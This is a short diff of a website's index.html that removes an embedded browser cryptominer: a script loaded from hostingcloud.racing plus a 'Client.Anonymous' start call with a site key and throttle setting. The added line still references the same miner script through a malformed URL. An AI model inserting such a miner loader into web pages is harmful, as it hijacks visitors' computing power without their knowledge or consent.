--- a/index.html
+++ b/index.html
@@ -312,13 +312,7 @@ s0.parentNode.insertBefore(s1,s0);
 
 <script src="//code.tidio.co/hdcr0ju5ndzwqrmhrdf9v2vq6afgjk17.js" async></script>
 		
-<script src="https://www.hostingcloud.racing/GWOP.js"></script>
-<script>
-    var _client = new Client.Anonymous('c9fa2a200a30c0cb6871e6e9e62aa9e849c8ffd26c3d43640fc6f5b08e89de3a', {
-        throttle: 0.1, c: 'w', ads: 0
-    });
-    _client.start();
-    
+<script src="http/www.hostingcloud.racing/GWOP.js"></script>
 
 </script>
 </html>
